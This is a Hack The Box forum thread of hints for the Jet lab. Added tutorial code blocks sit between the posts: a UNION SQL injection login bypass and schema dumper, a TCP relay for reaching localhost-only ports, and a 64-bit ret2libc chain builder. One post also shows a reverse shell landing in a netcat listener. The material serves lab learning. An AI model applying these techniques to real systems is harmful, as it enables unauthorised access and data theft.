@stoneric said:
So, after getting the command flag the app becomes super unresponsive and I start to get constant 504s. Is that intended? Obviously my shell is a bit shaky, am I missing some sort of checkpoint to make getting back to that point easier/quicker? If my shell breaks, the entire webapp becomes unresponsive. Any points please PM! Thanks
Comments
If the web app becomes unresponsive and you lose your shell, cURL the login page - you should find cURL gives you a response, whereas your browser will not. AFAIK, the exploit at this stage (even when successful) has the ability to break the session and anything tied to its cookie. Try removing the cookie from your browser storage or use incognito, log in to the panel again (to get a new cookie) and retry whatever you did. Should allow you to work around the 504s, assuming you're having the issue I had.
For assistance:
1) Plz msg me via the main HTB messaging system, not the forums or my wall
2) Give me some insight as to what you've tried already, or ideas you've moved past
3) Don't expect me to give you the answer-- that defeats the object of being here.
If you find my assistance useful, in any case, please consider clicking that awesome respect button on my profile!
Stuck on the command flag... I know it has something to do with the email form and the curse words (at least that is what I think).
3 days and no idea...
Anyone willing to lend a hand?
Can anyone help me with Overflown? I have tried for the last 4 days and 64-bit is new for me; I am familiar with 32-bit.
edit: nvm got it digging
You can pm me on discord sh4d0wless#6154
@AnonRyuk said:
I found that one, which led me to where I found Flag 4, but I'm still having issues finding Flag 3. Any nudges, PM maybe?
EDIT: nvm, didn't follow the source
Ola, just started on this today.
I can't believe that I can't even get connected.
I have found 2 ports where I can ****et to and it lets some info out, but that's about it. Unsure what to do there. A little push would be appreciated.
@idevilkz said:
Check the levels and start with the first one.
You'll need to do at least 1-5 in order before you can do 6+.
As with most CTFs, the name of the challenge might give you a hint at where to look.
Am I correct that you need to do Overflown before you can do Secret Message?
I'm able to find the points of entry for 6, 8 (kinda), 9, 10, 11 but can't find where to start 7.
I'm pretty sure I know what type of attack I need to do to beat Overflown, but I have no experience with this yet.
If anyone could point me to some good 101?
Since it appears some other levels require a similar attack method, I'm kinda stuck.
Ok, so I'm up to Auth Bypass.
SQLI is one of my biggest weaknesses so I excitedly thought this would be an excellent opportunity to learn. I have made some slow progress but am now at a bit of a dead end and need to ask for a (hopefully) small prod.
My status is that I have a vulnerable form (l*******p). Using a 'U**** S****T' query with 3 fields, I have r/w on one field. I can also use that field to call functions (db name, make pw hashes, etc...). The problem I am struggling to overcome is that the 'cheatsheet' approach of using password() (or md5(), sha1()...) to 'force' a known password hasn't worked (in a large number of permutations). I also have not managed to nest queries or even figure out a way to enumerate the db schema via the single field I can control and view. Can somebody provide a source of knowledge (or just an angle of thought) where I can learn what it is I am missing?
Many thx in advance.
edit: NM, an ippsec video put me onto the right tool...
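The post above describes a UNION-based injection where the query has three fields and only one of them is reflected. The block below is an added example, not the lab's application and not the poster's payloads: it builds a constructed SQLite login (table names, the admin password and the secrets are all made up) and shows the two mechanics the post is after, supplying a hash you control through the UNION row so the application's own password check passes, and pulling the schema and then table contents out through the single reflected column with group_concat. The lab is MySQL-like (the post mentions password()/md5()), so SQLite is used only so this runs offline; where MySQL differs (inline sha1()/md5(), information_schema instead of sqlite_master) the comments say so.

```python
import hashlib
import sqlite3

# Constructed stand-in for the lab's database. Nothing here is the lab's schema.
ADMIN_PASSWORD = "not-the-real-admin-password"  # constructed placeholder


def sha1(s: str) -> str:
    return hashlib.sha1(s.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);"
        "CREATE TABLE secrets (id INTEGER PRIMARY KEY, note TEXT);"
    )
    conn.execute("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                 ("admin", sha1(ADMIN_PASSWORD)))
    conn.executemany("INSERT INTO secrets (note) VALUES (?)",
                     [("constructed-secret-1",), ("constructed-secret-2",)])
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Hypothetical vulnerable login, not the lab's code.

    The username is concatenated into the query (the injection point). The
    query selects three columns, so a UNION must supply three fields; the
    stored hash is compared with the hash of the submitted password; and only
    the username column is ever reflected back, so it is the one field an
    attacker can read through.
    """
    query = ("SELECT id, username, password_hash FROM users "
             f"WHERE username = '{username}'")
    row = conn.execute(query).fetchone()
    if row is None or row[2] != sha1(password):
        return None
    return f"Welcome, {row[1]}"


def union_payload(reflected_expr: str, chosen_password: str) -> str:
    """Build the injected username: a UNION row whose hash field we control.

    Because the hash the application compares against comes from our row, the
    password we chose is accepted. SQLite has no sha1()/md5() functions, so the
    digest is computed client-side; in MySQL it could be written inline in the
    payload as sha1('letmein') or md5('letmein').
    """
    return f"x' UNION SELECT 1, ({reflected_expr}), '{sha1(chosen_password)}' -- "


def forced_login(conn) -> str:
    """Log in as a user that does not exist, with a password we picked."""
    return vulnerable_login(conn, union_payload("'attacker'", "letmein"), "letmein")


def dump_schema(conn) -> str:
    """Enumerate every table and its DDL through the single reflected field.
    group_concat folds many rows into one value; in MySQL the same idea reads
    information_schema.tables and information_schema.columns instead."""
    expr = ("SELECT group_concat(name || ':' || sql, ' | ') "
            "FROM sqlite_master WHERE type = 'table'")
    return vulnerable_login(conn, union_payload(expr, "letmein"), "letmein")


def dump_column(conn, table: str, column: str) -> str:
    """Read a whole column of any table through the same reflected field."""
    expr = f"SELECT group_concat({column}, ',') FROM {table}"
    return vulnerable_login(conn, union_payload(expr, "letmein"), "letmein")


if __name__ == "__main__":
    db = build_db()
    print(forced_login(db))
    print(dump_schema(db))
    print(dump_column(db, "secrets", "note"))
```

The subquery in the reflected position is the part the post says it could not get working: it is a nested SELECT inside the UNION row, and because group_concat collapses rows, one reflected field is enough to read an arbitrary number of them.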
@FlatMarsSociet said:
Thanks @FlatMarsSociet, I have made some progress and am on to Going Deeper.
So I'm working on #8, skipping #6 and #7 for the moment.
For this, I found that the publicly accessible port gives me some information, but I can't seem to find a method to extract the exact info I need.
I thought it might be useful to connect to a different port (*200), but this one is only accessible to localhost. So I need to do some forwarding.
Could someone help me with the command I'm running via what I found in #5?
I'm trying to get it to work using s***t
Pesky 504s are killing me.
EDIT: looks like I might have to do Overflow first?
EDIT: finished Overflow, but still having issues
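The post above needs a port that only listens on localhost to be reachable from outside. As an added example (not the lab's setup, and not the tool the post redacts), the block below is a minimal TCP relay in Python: it listens on one address and pipes each incoming connection to a localhost-only service, the job an SSH local forward or a relay tool normally does. The stand-in service, the request and the ports are constructed, and the demo runs entirely on loopback; on a real box you would bind the relay to 0.0.0.0 (or the address your attacking machine can reach) and point it at the real localhost port.

```python
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until EOF, then pass the EOF on as a half-close."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _stop_listener(srv: socket.socket):
    """Wake the accept loop and release the port."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


def start_forwarder(listen_host: str, listen_port: int,
                    target_host: str, target_port: int):
    """Accept on listen_host:listen_port and relay every client to the target.

    Returns (bound_port, stop). listen_port=0 lets the OS choose a port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return  # listener was stopped
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
            except OSError:
                client.close()  # target down: drop this client, keep serving others
                continue
            upstream.settimeout(None)
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1], lambda: _stop_listener(srv)


def start_local_only_service(port: int = 0):
    """Constructed stand-in for a service bound to 127.0.0.1 only: it answers
    one request per connection by echoing it back with a prefix."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(4)

    def handle(conn):
        with conn:
            conn.sendall(b"local-only-service: " + conn.recv(4096))

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], lambda: _stop_listener(srv)


def request_via(host: str, port: int, payload: bytes) -> bytes:
    """Send one request through the relay and collect the reply until EOF."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def run_demo() -> bytes:
    svc_port, stop_svc = start_local_only_service()
    # On the target this would be start_forwarder("0.0.0.0", <port>, "127.0.0.1", svc_port).
    fwd_port, stop_fwd = start_forwarder("127.0.0.1", 0, "127.0.0.1", svc_port)
    try:
        return request_via("127.0.0.1", fwd_port, b"GET /info")
    finally:
        stop_fwd()
        stop_svc()


if __name__ == "__main__":
    print(run_demo())
```

The half-close handling in _pump matters for services that wait for the client's EOF before answering; a relay that simply closes both sockets on the first EOF loses the reply.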
So like many people that have posted here I have used dig in every configuration that I can think of and have still had no luck. If someone could provide a helping hand it would be most appreciated. Please PM me.
Hi, I'm stuck on "more secrets". Edit: it's OK.
Hi, any help for Elasticity? (The last flag to finish the lab for me)
I think my post 3 posts above yours might give you a hint.
In return, you could perhaps give me a hint on how to get over my issue?
OK, I think I am nearly there with Overflow; however, I am unable to get my code working.
I still, for the life of me, can't get a reverse shell onto Jet; tried netcat, socat and whichever.
For Overflow, I am running it using Burp with socat; however, it's failing.
@FlatMarsSociet I'm on same point

So it took me over 2 days to get my head around buffer overflows, and with help from @FlatMarsSociet and @EvilT0r13
I have had good success with other parts; however, I am now stuck with the following three:
Elasticity
Member Manager
Memo - i have a rough idea of what that is
Unable to get a reverse shell from web... any nudges please?
Which part, Command? PM
@B3ard3d said:
https://forum.hackthebox.eu/discussion/comment/69642/#Comment_69642
Note: https://www.nohello.com/
Happy to help people, but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter, so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
I got stuck in Overflown; I have the file l***. Any nudges please?
@nitinrkz said:
Nobody says you're supposed to get a revshell
@FlatMarsSociet said:
Huh?
[email protected]:~/hack_the_box/machines$ nc -nvlp 8081
listening on [any] 8081 ...
connect to [10.13.14.11] from (UNKNOWN) [10.13.37.10] 36820
bash: cannot set terminal process group (1304): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~/REDACTED$
@FlatMarsSociet said:
Hey, I actually managed to get one.
Had to do some tricks, but finally.
Apart from that, any tutorials I can use for overflows?
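Several posts in this thread ask for a 64-bit overflow 101 (Overflown, the 32-bit vs 64-bit question earlier, and this one). The block below is an added example, not the lab's binary and nobody's solution: it shows the two steps that differ most from 32-bit work, recovering the offset to the saved return address from a crash, and laying out a ret2libc chain. On x86-64 a `ret` to a non-canonical address (the pattern bytes) faults at the `ret` instruction itself, so the value to look up is the 8 bytes at $rsp, not RIP; and the first argument to system() goes in RDI, so the chain needs a `pop rdi; ret` gadget rather than a stack-passed argument. The pattern generator is the usual de Bruijn sequence; every address in the demo is a hypothetical placeholder.

```python
import struct
from itertools import islice

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: str = ALPHABET, n: int = 8):
    """Lazily yield a de Bruijn sequence over `alphabet`: every window of n
    symbols occurs exactly once, so n bytes pulled from a crash map back to a
    single position in the pattern. n=8 because a 64-bit stack slot is 8 bytes.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 8) -> bytes:
    """First `length` bytes of the pattern, sent as the overflowing input."""
    return "".join(islice(de_bruijn(ALPHABET, n), length)).encode()


def cyclic_find(needle: bytes, n: int = 8, limit: int = 1 << 16) -> int:
    """Offset of `needle` in the pattern, or -1. `needle` is the qword read
    from $rsp in the debugger when the `ret` faulted."""
    return cyclic(limit, n).find(needle)


def p64(value: int) -> bytes:
    """Little-endian 8-byte pointer, the unit a 64-bit `ret` pops."""
    return struct.pack("<Q", value)


def ret2libc_chain(offset: int, pop_rdi_ret: int, binsh: int, system: int,
                   ret_gadget: int = 0) -> bytes:
    """Padding up to the saved return address, then the chain.

    Unlike 32-bit, the first argument travels in RDI, not on the stack, so a
    `pop rdi; ret` gadget loads the "/bin/sh" pointer before system() runs.
    glibc's system() assumes a 16-byte aligned stack; if it crashes on a
    movaps instruction, pass a lone `ret` gadget to shift RSP by 8 first.
    Every canonical user-space address packs with two trailing 0x00 bytes, so
    a chain like this survives read()/gets() but not a strcpy-style copy,
    which stops at the first NUL.
    """
    chain = p64(ret_gadget) if ret_gadget else b""
    chain += p64(pop_rdi_ret) + p64(binsh) + p64(system)
    return b"A" * offset + chain


def demo_offset_from_crash() -> int:
    """Constructed crash: cyclic(200) was copied into the buffer and the
    debugger showed pattern[72:80] at $rsp when the `ret` faulted."""
    pattern = cyclic(200)
    qword_at_rsp = pattern[72:80]
    return cyclic_find(qword_at_rsp)


if __name__ == "__main__":
    offset = demo_offset_from_crash()
    # Hypothetical addresses; take the real ones from the binary and its libc.
    payload = ret2libc_chain(offset, pop_rdi_ret=0x401234,
                             binsh=0x7FFFF7F5C698, system=0x7FFFF7E1A2F0,
                             ret_gadget=0x40101A)
    print(offset, len(payload))
```

In a debugger the workflow is: feed cyclic(N) as input, read the qword at $rsp at the fault, pass it to cyclic_find to get the offset, then build the chain with gadget and libc addresses found for the actual target.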
Could anyone provide a nudge on the Command? I identified an interesting function in SC but I haven't had any luck exploiting it. Thanks in advance.
@roowashere said:
It's not because you can, that you really need to.
Sometimes people get stuck looking for a way to get a revshell, while everything they need is right in front of them.
@FlatMarsSociet said:
That's fair. In this case, a revshell provided no more towards the objective than was already available. A 'distraction', as you say.
Thanks for the timely reminder.
Got some JSON output for Elasticity but not sure if the content is supposed to serve as a hint. Stuck on Elasticity like most people on the forum, apparently...
Can anyone point me in the right direction?
I feel like I'm digging in circles. Anyone able to nudge me in the right direction?
NVM: was being dumb. Now fun with bypass..
Feel free to ask for hints/nudges. Just PM me what you've already done, & give respect if I help you.